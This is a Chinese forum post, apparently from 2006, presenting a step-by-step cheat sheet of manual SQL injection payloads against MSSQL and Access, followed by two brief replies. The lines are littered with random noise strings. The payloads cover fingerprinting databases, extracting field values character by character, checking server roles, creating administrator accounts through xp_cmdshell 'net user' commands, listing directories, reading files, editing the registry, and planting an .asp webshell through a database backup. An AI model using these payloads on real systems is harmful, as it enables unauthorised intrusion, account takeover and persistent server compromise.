社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3587阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 @gTpiV2  
  2.初步判断是否是mssql ;and user>0 N;ssO,  
Ujw ^j  
  3.注入参数是字符'and [查询条件] and ''=' W'6*$Ron  
Oys.8%+ P  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' 4;j #7  
9K)OQDv%6D  
  5.判断数据库系统 }3vB_0[r  
'g ,Oi1|~  
  ;and (select count(*) from sysobjects)>0 mssql (*hA0&n  
Y`c\{&M6  
  ;and (select count(*) from msysobjects)>0 access kQ4%J, 7e4  
6!+"7r6  
.8wR;^  
N8m^h:b  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 a0AIq44  
 ~LkReQI  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 E9 q8tE}  
~1}NQa(  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 q9!5J2P  
8mx5K-/,y^  
  9.(1)猜字段的ascii值(access) '+-R 7#  
v< ;, x  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 S0"O U0`N  
?#]c{Tlpz  
  (2)猜字段的ascii值(mssql) %L~X\M:Qk  
!fz`O>-mZ  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 x)V.^-  
/$ L;m  
  10.测试权限结构(mssql) #JTi]U6`  
Sgr<z d'b  
\@I.K+hj$  
e2Xx7*vS  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 12cfqIo9  
KF7f<  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- WhK?>u  
]4hXK!^Uu  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 36lIV,YnU  
'8%aq8  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- cL=P((<K?  
8l)l9;4 6  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- |5g*pXu{  
n>iPA D  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #=$4U!yL  
sU{+.k{  
  ;and 1=(select IS_MEMBER('db_owner'));-- c~c3;  
v[lytX4)  
q^12Rj;H  
v~@Y_ `l  
  11.添加mssql和系统的帐户 L.|GC7$0  
$SXF>n{}  
  ;exec master.dbo.sp_addlogin username;-- 8 5s{;3  
  ;exec master.dbo.sp_password null,username,password;-- A"9aEOX-?i  
Ppx*  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- w.0.||C O  
vTB*J,6.  
  ;exec master.dbo.xp_cmdshell 'net user username password rj{'X  /  
)8iDjNM<  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- m]u#Dm7h  
^,`Lt *  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 4+ 4? 0R  
XK&#K? M  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t?c*(?Xa  
iPkG=*Ip(%  
U&B~GJT+  
J(l6(+8  
  12.(1)遍历目录 xds"n5  
s )To#  
  ;create table dirs(paths varchar(100), id int) !`aodz*PO  
^_<pc|1  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' DO %YOv  
tB1Qr**  
  ;and (select top 1 paths from dirs)>0 2QBtwlQ?[  
-(1e!5_-@  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 525xm"Bs  
-<<!eH  
Z:n33xh=<  
E8-p ,e,  
  (2)遍历目录 6=H-H\iw  
)s^XVs.-  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 5-&P4  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Q!|71{5U  
+SP5+"y@  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *}2o \h6Q  
S)[2\Z{**T  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ~S=hxKI  
X0=R @_KY  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 i:z A(  
gr-%9=Uq  
PH=wP ft  
t8^*s<O  
  13.mssql中的存储过程 m<076O4|`  
o-(jSaH :;  
  xp_regenumvalues 注册表根键, 子键 z?i82B[Tm  
nF//y}  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 JE?XZp@V  
\ tQi7yj4  
  xp_regread 根键,子键,键值名 "iKK &%W  
0\i&v  
  ;exec xp_regread &MKv _  
kPxrI=  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 RnTPU`  
{uhw ^)v  
  xp_regwrite 根键,子键, 值名, 值类型, 值 R2;-WxnN]  
v/m6(z  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 T$q]iSgu  
*vj5J"Y(;t  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Y- w5S|!  
BzgDhDj  
  xp_regdeletevalue 根键,子键,值名 */ qv}  
K1C#  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 W*_ifZ0s.  
hxtu^E/  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 EoY570PN  
JY_' d,O  
I)sCWC:Mq~  
k r/[|.bq  
  14.mssql的backup创建webshell M2m@N-+R   
@ojn< 7W  
  use model 3W27R  
zz$*upxK  
  create table cmd(str image); S]9xqiJW  
)>?K:y8I~  
  insert into cmd(str) values (''); N(IUNL  
RLIugz{IH  
  backup database model to disk='c:\l.asp'; fa6L+wt4O  
"? R$9i  
kdF# Nm  
3 =S.-  
  15.mssql内置函数 / AW]12_  
A\?O5#m:$  
  ;and (select @@version)>0 获得Windows的版本号 .E@yB`AR  
xo]|m\#k5E  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa `zTVup&  
dM$]OAT  
  ;and (select user_name())>0 爆当前系统的连接用户 K!'9wt  
6T)D6;@L  
  ;and (select db_name())>0 得到当前连接的数据库 dvUJk<;w  
Qn6&M  
6>KDK<5NQ  
0chBw~@*s  
  16.简洁的webshell qf'uXH  
8_:jPd! 3  
  use model  /y1,w JI  
5Rc 5/m  
  create table cmd(str image); j]kx~  
i)eub`uMy  
  insert into cmd(str) values (''); (B[0BjU  
0;]tC\D1  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八